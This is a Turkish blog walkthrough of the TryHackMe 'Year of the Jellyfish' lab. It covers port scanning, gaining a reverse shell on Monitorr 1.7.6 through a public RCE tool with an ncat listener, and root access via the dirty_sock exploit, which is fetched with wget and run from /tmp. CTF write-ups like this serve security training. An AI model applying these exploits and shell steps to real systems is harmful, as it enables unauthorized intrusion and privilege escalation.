Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Tryhackme Year of the Jellyfish Çözümü

Tryhackme Year of the Jellyfish Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 4 dk okuma süresi
355 0
Tryhackme Year of the Jellyfish Çözümü 2

Bu yazımda Tryhackme Year of the Jellyfish Çözümü sizler için detaylı olarak paylaşacağım. 

1- İlk olarak portları tespit ederek başlıyorum. Tarama yaptığımda 21,22,443,8000 portunun açık olduğunu tespit ettim. İncelemeye devam ediyorum.

2- 443. port altına baktığımızda SSL sertifika içerisinde farklı alt subdomainleri gördük bunlara ulaşmak için host adresimizin içerisine ekleyip devam edelim.

Portları detaylı inceledim ama önemli bir şeye ulaşamadım.

İlginizi çekebilecek yazımız: Apple, iOS 17.1 Güncellemesini Yayınladı

3- Terminale gelip sudo nano /etc/hosts içerisine girip subdomainleri ekleyip CTRL+x ardından Y enter yapıp çıkıyoruz.

  • robyns-petshop.thm
  • dev.robyns-petshop.thm
  • beta.robyns-petshop.thm
  • monitorr.robyns-petshop.thm

4- Tüm subdomainleri inceledim bir şey bulamadım ama monitorr alt alanına gittiğimde en alt kısımdan 1.7.6 versiyonu olduğunu öğrendim. Gidip searchsploit üzerinden versiyona uygun exploit araştırmaya başlıyorum.

5- İki tane exploit buldum, ikisini de indirip denedim ama exploit’ler çalışmıyor. İçerisinde düzenleme yapmama rağmen yine bir sonuç çıkmadı. İnternet üzerinden araştırma yapmaya devam ediyorum.

6- Evet karşıma bu çözdüğümüz makine için yazılmış python bir araç buldum. 🙂 Buradan direkt devam edebiliriz.

Bu araç direkt makine içerisinden shell almamıza olanak sağlıyor.

7- Masaüstüne geçiş yapıp aracı indirdim.

İlgili Link: https://github.com/jayngng/monitorr-v1.7.6m-rce 

8- Araca yetki verdim ama çalıştırmaya başlıyorum.

9- Gösterdiği gibi yazıyorum. Local ip adresiniz tryhackme vpn ip adresinizdir. Local porta da 443 veriyoruz.

Öncesince ncat -lvnp 443 yazıp dinlemeye almayı unutmayın.

10- Direkt olarak makine içerisindeyiz. İlk bayrağımızı bulalım.

11- /var/www içerisine geçiş yaptım ve direkt bayrağı bulduk. Yetki yükseltmeye başlayalım.

12- Makine içerisine linpeas’ı yükleyerek araştırmaya çalışıyorum. Ama araç ile önemli bir şey bulamadım.

Year of the Jellyfish

13- Kernel exploit ve versiyona göre internette detaylı araştırmaya yapmaya başlıyorum.

4.15.0 versiyon ve snap versiyon üzerinden de uygun exploit arıyorum.

Year of the Jellyfish

14- Tmp klasörüne geçiş yapıp;

wget https://github.com/initstring/dirty_sock/archive/master.zip yazıp indirmeyi yapıyoruz.

Dirty sock yetki yükseltme de sistemi exploit ederek direkt hedef kullanıcısının kullanıcı adı ve şifresini bize verecek bizde direk root kullanıcısının içerişine geçiş yapmamıza olanak sağlayacak.

Year of the Jellyfish

15- Direkt olarak bize kullanıcının parolasını verdi.

  • unzip master.zip
  • chmod+x dirty_sockv2.py
  • ./dirty_sockv2.py

Year of the Jellyfish

16- Kullanıcı adı ve parola;

  • dirty_sock
  • dirty_sock

dirty kullanıcısının içerisindeyiz. Tekrardan root içerisine geçiş yapmaya çalışıyorum ve evet direkt olarak root içerisindeyiz.

Year of the Jellyfish

17- Bayrağı bulduk ve Tryhackme Year of the Jellyfish Çözümü sonuna geldik. Yeni yazılarda görüşmek üzere, sağlıcakla kalın..

Year of the Jellyfish

 

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir